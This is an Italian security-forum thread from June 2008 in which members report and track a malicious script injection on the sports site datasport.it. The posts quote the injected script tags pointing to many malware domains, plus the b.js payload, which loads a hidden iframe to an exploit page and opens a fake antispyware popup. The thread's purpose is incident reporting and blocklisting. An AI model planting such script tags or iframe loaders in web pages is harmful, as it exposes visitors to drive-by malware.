[NEWS]Sito datasport.it ulteriormente compromesso

[juninho85]

Giovedì 5 gugno 2008

Nel momento in cui scrivo il sito Datasport.it,sezione news calcio serie A, è stato ulteriormente violato: presenti redirect ai siti:

Quote:

http://www.encode72.com/b.js
http://www.view89.com/b.js
http://www.exec51.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.sslnet72.com/b.js
http://www.win496.com/b.js

Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

Ho già provveduto a segnalare la cosa a datasport.it(ore 10:05).
Avira premium con webguard attivo non segnala nulla di anomalo riguardo lo script

Consiglio a chi utilizza Internet Explorer e l'analisi completa del sistema,idem per chi utilizza Firefox SENZA l'estensione NoScript installata e attiva.

Link all'analisi dello script su virustotal.com
Contenuto dello script su datasport.it

Quote:

<script src=http://www.view89.com/b.js></script><script src=http://www.encode72.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.sslnet72.com/b.js></script><script src=http://www.win496.com/b.js></script></a></span></div>

Contentuto dello script in oggetto:

Quote:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}

Il tutto dopo quanto era successo Lunedì 2 giugno come potete leggere qui ...anche questo problema segnalato in quella stessa data senza aver ottenuto uno straccio di risposta ma cosa ben più grave senza che chi si occupa del portale non abbia provveduto a correre ai ripari nè per ripulire il codice delle varie sezioni del portale nè per eliminare eventuali falle nei software utilizzati
Seguiranno aggiornamenti

[juninho85]

Questo il contenuto infetto della Homepage:

Quote:

script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>

altra porzione sulla medesima riga:

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>

idem come sopra:

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.sslput4.com/b.js></script><script src=http://www.exe94.com/b.js></script><script src=http://www.exec51.com/b.js></script><script src=http://www.win496.com/b.js></script>

Quote:

<script src=http://www.err68.com/b.js></script><script src=http://www.exe94.com/b.js></script>

sembrerebbe che i link scritti nel codice con sql injection cambi a seconda della sezione che si consulta

[juninho85]

dettagli:di tutti i siti in cui è stato fatto un defacement inserendo le scritte

Quote:

hacked by RedRolix sari_seytan And LupuS Rebel Group NOWAR

datasport.it mi risulta essere l'unico che ha subito l'ondata di sql injection con redirect a domini esterni
Questo mi fa supporre che datasport.it abbia subito due attacchi da diversi autori

[Edgar Bangkok]

Sito Datasport Ora sono script pericolosi
Juninho85 mi segnala che il portale italiano di sport Datasport presenta segni di un nuovo attacco di hacking ma questa volta di gran lunga piu' pericoloso dell'attacco di qualche giorno fa'
In precedenza si era verificata la presenza di numerose pagine su dominio datasport.it che presentavano il messaggio “hacked by RedRolix .......” e concludendo il post scrivevo:
“........... l'analisi de codice sorgente delle pagine colpite non rivela altri problemi a parte la scritta di hacking il che fa pensare che si tratti solo di una azione dimostrativa come avviane quotidianamente su parecchi siti anche .IT ..............Rimane comunque la gravita' del fatto in quanto dimostra una vulnerabilita' dei siti o dei server che li ospitano che potrebbe essere sfruttata per azioni ben piu' pericolose. (redirect a malware, pagine con exploit ecc...) .......”
In effetti sta succedendo proprio questo e sia Datasport che altri domini sempre ad esso collega sul medesimo ip hostano adesso pericolosi scirpt che linkano a malware ma non solo
Ecco un report eseguito con webscanner:
dove si vede la grande quantita' di script presenti su varie url tutte collegate a datasport (questa volta nascosti nel codice e non visibili nel layout della pagina) e questo il sorgente di una pagina
Per quanto si riferisce al codice dello script
oltre al pericoloso link a pagina con explot abbiamo il link ad un sito antimalware fasullo che, ad aumentare il pericolo, se ce ne fosse bisogno, a differenza dei siti di rogue applications questa volta, anche lui, distribuisce malware e non semplice applicazione fasulla.
Questo il report VT
Quello che sorprende dell'attacco e' la grande quantita' di nomi diversi di pagine a cui puntano gli scripts e comunque e' quasi certo che datasport non sara' l'unico dominio attaccato ma sicuramente anche altri siti .IT subiranno medesima sorte.

A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"

Edgar

[juninho85]

Quote:

Originariamente inviato da Edgar Bangkok

A mio avviso comunque non sono le stesse persone che hanno fatto l hacking precedente, come scrivo sul blog.
A chi esegue questi attacchi non conviene farsi pubblicita' con proclami sulle pagine attaccate ma se mai agire ben nascosto ottenendo il massimo della distribuzione di malware.
Il fatto delle scritte di hacking precedenti segnala comunque che erano tutti siti (o server) facilmente" bucabili"

Edgar

mi trovi perfettamente d'accordo,come puoi leggere sopra...probabilmente c'è stato una sorta di passaparola tra malintenzionati...
se ti possibile sarebbe molto utile raccogliere l'insieme dei domini presenti nelle varie sezioni del portale in modo da poterli inserire in blocklist

[Edgar Bangkok]

Sembra che ora Datasport sia offiline
Forse provvederanno a bonificare il sito.
A me comunque risultavano questi script presenti sulle pagine

Codice:

<script src=http://www.en-us18.com/b.js>
<script src=http://www.libid53.com/b.js>
<script src=http://www.rundll92.com/b.js>
<script src=http://www.redir94.com/b.js>
<script src=http://www.locale48.com/b.js>
<script src=http://www.err68.com/b.js>
<script src=http://www.sslput4.com/b.js>
<script src=http://www.exe94.com/b.js>
<script src=http://www.exec51.com/b.js>
<script src=http://www.win496.com/b.js>
<script src=http://www.sslnet72.com/b.js>

di cui alcuni presenti ad esempio sulla lista di malwaredomains
(img sul blog)

Edgar

http://edetools.blogspot.com/

[Chill-Out]

A me risulta online, ma stanno pulendo a razzo

[juninho85]

la sezione news serie A calcio è stata ripulita,come anche la homepage(che poi son le 2 pagine da noi segnalate)...sul resto delle sezioni non è cambiato nulla PER ORA

[GmG]

Quote:

Originariamente inviato da juninho85

Giovedì 5 gugno 2008

[CUT]
Tali script se non ho letto male(putroppo a lavoro non ho i mezzi adatti ad approfondire la cosa)reindirizzano a un falso antispyware e,cosa più pericolosa,a domini in cui è hostato l'MBR Sinowal.

[CUT]

E' l'asprox botnet e non il Sinowal (l' unica cosa in comune è che utilizzano lo stesso kit per exploit (Neosploit)).

[Edgar Bangkok]

Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar

[Ignorante Informatico]

Quando si dice che c'è del marcio in Serie A ...

[juninho85]

Quote:

Originariamente inviato da Edgar Bangkok

Sono passate 2 ore, rifacendo una scansione di script ne trovo quasi piu' di prima
Siete sicuri che la home e' bonificata ???

Edgar

è stata bonificata(vista con i miei occhi)e poi pare sia stata rimodificata
la sezione basket/homepage(anch'essa infettata in mattinata)risulta non disponibile
la sezione news calcio serie A è stata ripulita

[Edgar Bangkok]

Al momento , 11.22 PM Thai (6.22 PM Ita) la home datasport e' tornata pulita ma una scansione rileva ancora almeno una trentina di scripts sparsi su 4 pagine (due pagine su sportmoviestv )

Edgar

[GmG]

Nuovamente infetto

[Chill-Out]

Quote:

Originariamente inviato da GmG

Nuovamente infetto

Gia, ma che cosa stanno combinando

[juninho85]

Quote:

Originariamente inviato da GmG

Nuovamente infetto

in quali pagine?io ora sto visualizzando le news calcio serie a e non vedo nulla...
la homepage del basket ormai non è più raggiungibili così come molte altre aree(chissà se per manutenzione o per altri motivi...) da diverse ore,mentre la home del portale risulta essere pulita
intanto la segnalazione dello script malevolo ad avira non è andato a buon fine,per loro è tutto ok!

[GmG]

Nell' HomePage del sito ci sono

Codice:

http://www.sslnet72.com/b.js
http://www.view89.com/b.js

[juninho85]

confermo
intanto su 213.156.44.204,IP in cui oltre a datasport.it si trovano altri 7 domini,risultano nella medesima situazione www.STEFANOLAVORI.COM e
www.DATABASKET.NET(facente parte sempre di datasport)

[Edgar Bangkok]

Questa mattina , ora thai, (le 3 AM del 6 giugno in Italia) ho riverificato il sito dtasport
Ci sono ancora alcune pagine con scripts per un totale di 176 presenze del codice
Ho messo un aggiornamento del report su blog
http://edetools.blogspot.com/

Per il fatto che dopo che era bonificato veniva di nuovo colpito penso che 'curassero' i sintomi dell'attacco (ripristinando qualche backup) ma non le cause... e quindi tutto ritornasse come prima.

Edgar

[Edgar Bangkok]

Ad una verifica eseguita nuovamnete dopo qualche ora (10.30 am in italia) s sembra che il numero di scripts presenti sia ancora abbastanza elevato.

Ci sono in totale , nelle pagine controllate, 267 scripts.
(report aggiornato sul blog)

Edgar

http://edetools.blogspot.com/